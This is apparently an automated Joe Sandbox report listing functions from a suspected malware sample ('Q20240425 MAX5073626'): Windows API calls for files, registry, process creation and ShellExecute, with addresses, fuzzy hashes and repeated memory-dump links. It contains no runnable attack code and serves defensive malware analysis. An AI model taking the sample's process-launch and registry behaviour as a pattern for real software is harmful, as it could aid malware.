Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f6b7e41df0685c4d87fd176133b42d9659901a1392ff5a6db3843eb4367b1fa6
Instruction ID: 4ae5381cac1a5692e563b2ee8488c5ee90d5112b7c435f43d555caeb0d796870
Opcode Fuzzy Hash: f6b7e41df0685c4d87fd176133b42d9659901a1392ff5a6db3843eb4367b1fa6
Instruction Fuzzy Hash: 01D09E71118201AEDF054F20DE4AF1E7A65EF84720F114A2CF5A2D40F0DA718865AA11

Uniqueness

Uniqueness Score: -1.00%

Function 00406BC3 Relevance: 3.0, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,004065B7,?,?,00000000,004068D4,?,?,?,?), ref: 00406BC8
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BDF

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 196e45e2008971472f20fc54261bbb41ab7d3684cfcaad04ae8c55cb7c580a85
Instruction ID: bc143518a886d0da5f3323849e6096d7a2261ce03bdbbe77323b2ad93cd1fddc
Opcode Fuzzy Hash: 196e45e2008971472f20fc54261bbb41ab7d3684cfcaad04ae8c55cb7c580a85
Instruction Fuzzy Hash: 3BD0C7765045306BC6141728DD0C45A7A51DF853717154739B5F6A62F0DB315C628694

Uniqueness

Uniqueness Score: -1.00%

Function 004025AC Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,000003FF,00000000), ref: 004025E1

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 22516cbd50d66d69165365f74973f920607c9044153fbe0373c22fc75c416c2b
Instruction ID: 4a55a9e7f5621efaed35dedf74b5271bfaa34f3e59f0aefbd8a146d543201646
Opcode Fuzzy Hash: 22516cbd50d66d69165365f74973f920607c9044153fbe0373c22fc75c416c2b
Instruction Fuzzy Hash: 71F090326443446BD310DFA1DC84A6AB39CFB44365F104A3AFA559B1C1E7B89A058366

Uniqueness

Uniqueness Score: -1.00%

Function 00402566 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 004025A1

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc31bd972c378d31ca8ace9f1a7b6022b871ff5c5f93a71e74b8966d42eb1a6a
Instruction ID: 9c0c34e48b3cd51ebf4fc9d6d8f3c465cde9ed9ce60f26cb06ea3e30feb9d0dc
Opcode Fuzzy Hash: cc31bd972c378d31ca8ace9f1a7b6022b871ff5c5f93a71e74b8966d42eb1a6a
Instruction Fuzzy Hash: 9AE09A32501394BED6303A738D09E2B398C5B407A2B65023FB806B23CAE9B98E01812D

Uniqueness

Uniqueness Score: -1.00%

Function 0040696E Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 00406985

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 11e98501215263af6d8f2170805d6017c1d35df30ce3e57717fa887770caa038
Instruction ID: aed7c9a4cde95c8ec0d72e517339a00ec8eb68e6dfc00f227df730fbf65e67e0
Opcode Fuzzy Hash: 11e98501215263af6d8f2170805d6017c1d35df30ce3e57717fa887770caa038
Instruction Fuzzy Hash: D8E04F72200018BB8F218F5ACC04D9FFF6CEF926A07024026B805A6110D270EA11C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 00406A31 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149E0,00403323,?,004149E0,?,004149E0,?,00000004), ref: 00406A48

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1a43bcc941cc04eb1e69e090e0c8f39a142cdc837d48c7fe24322eecdb3138e1
Instruction ID: 450276b5292395e7f32ec829e469ad42f07e3747de73e15cc9c10c666468ed89
Opcode Fuzzy Hash: 1a43bcc941cc04eb1e69e090e0c8f39a142cdc837d48c7fe24322eecdb3138e1
Instruction Fuzzy Hash: 6AE04F32200129BB8F20AF4ACC04D9FBF6DEF926A07014026B805A2110D274EA11CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004062CB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062F4

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f8030829f1ed8b951c28ec30d4765995d416a1c1369088578c48a055121a99d9
Instruction ID: 49280b0a6b06cb610c03c26c9e7c2c5240378bbf018279cbed56ec9ee8610ed3
Opcode Fuzzy Hash: f8030829f1ed8b951c28ec30d4765995d416a1c1369088578c48a055121a99d9
Instruction Fuzzy Hash: B7E0B6B2010209BEEF09AF91ED0ADBB3B2DEB08214F01453EF91695091E6B5E930A664

Uniqueness

Uniqueness Score: -1.00%

Function 004062FE Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069CB,00000800,?,?,?,: Completed,00000000,00000000), ref: 00406322

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 646f33df675fa4cf08bc3aa6274970f57b76d5a0886e9b9dad29ac5a7ae8d0f5
Instruction ID: ae38020bbd6ebd8b202908859428589a2a4854f21eb921252e4c09416ec354b8
Opcode Fuzzy Hash: 646f33df675fa4cf08bc3aa6274970f57b76d5a0886e9b9dad29ac5a7ae8d0f5
Instruction Fuzzy Hash: 1AD0123204020DBBDF115F909D01FAB3B6DEB18350F014426FE16A9091D775D530AB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040551D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cab6be965bc0ff0afa931026560f264918c84608a59ba459c7a9b22b08acd09e
Instruction ID: a55095c29797d5fff0df8dbac6fb81d278a6abc40cb3e873ad7111107cb3a841
Opcode Fuzzy Hash: cab6be965bc0ff0afa931026560f264918c84608a59ba459c7a9b22b08acd09e
Instruction Fuzzy Hash: ECC04CB17406027BEA20AB619E09F077759A760700F50846D7244A51D4EA74F514CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00406A28

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: de930baa0e2a58f77538b2a89e1362d0c7efc2ca4dac646fb397eb4491356700
Instruction ID: ce5b77e42761d051481a6340a4a56d84fd9774357d16012dc5024840c1df7dc4
Opcode Fuzzy Hash: de930baa0e2a58f77538b2a89e1362d0c7efc2ca4dac646fb397eb4491356700
Instruction Fuzzy Hash: 0BB09271240200AADA214F009F0AF057A22AB90B00F108424B294280F086711020EA1E

Uniqueness

Uniqueness Score: -1.00%

Function 00405538 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040536D), ref: 00405546

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c1fd066e34f8f0514121f54d03d528568694c8aa75b8d57a89629eadf2f3353d
Instruction ID: ebd57303e312e9373dfc843e04a7116ce18383ca8610824dadd53071523c2981
Opcode Fuzzy Hash: c1fd066e34f8f0514121f54d03d528568694c8aa75b8d57a89629eadf2f3353d
Instruction Fuzzy Hash: DEB092B5281601BBDA616B00DE09F49BA62A7A4701F008428B244240F0CAB600E5DB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040211B Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00405D6F: lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
Part of subcall function 00405D6F: lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
Part of subcall function 00405D6F: lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
Part of subcall function 00405D6F: SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
Part of subcall function 00405D6F: SendMessageW.USER32(?), ref: 00405E0D
Part of subcall function 00405D6F: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
Part of subcall function 00405D6F: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35

Part of subcall function 004066FC: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00424A20,?,?,?,Pata c",?), ref: 00406725
Part of subcall function 004066FC: CloseHandle.KERNEL32(?,?,?,Pata c",?), ref: 00406732

CloseHandle.KERNEL32(?,?), ref: 00402110

Part of subcall function 0040653A: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406544
Part of subcall function 0040653A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040656E

Part of subcall function 00406645: wsprintfW.USER32 ref: 00406652

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 248ccf485ffc6f0f509cb05982f504799725f01242cb947737ef08aa35f951a0
Instruction ID: 70dbf160186826cc0d7b56e25a286b1d518f06b7dcb5b143dd8eaf919be1be91
Opcode Fuzzy Hash: 248ccf485ffc6f0f509cb05982f504799725f01242cb947737ef08aa35f951a0
Instruction Fuzzy Hash: A4F0C8356093629BC310AF65EC8882F7398EF45359B100A3FFA52B51D1C77D4D068AAF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404453 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040446B
GetDlgItem.USER32(?,00000408), ref: 00404477
GlobalAlloc.KERNEL32(00000040,?), ref: 004044BF
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044D8
SetWindowLongW.USER32(00000000,000000FC,Function_00005905), ref: 004044EF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404505
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404517
SendMessageW.USER32(00000000,00001109,00000002), ref: 0040452A
SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404536
SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404548
DeleteObject.GDI32(00000000), ref: 0040454B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404579
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404583
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040462E
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404658
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040466E
GetWindowLongW.USER32(?,000000F0), ref: 0040469D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046AA
ShowWindow.USER32(?,00000005), ref: 004046BE
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047FB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404876
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404895
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004048C1
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048F6
ImageList_Destroy.COMCTL32(00000000), ref: 0040491D
GlobalFree.KERNEL32(00000000), ref: 0040492D

Strings

M, xrefs: 00404615

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
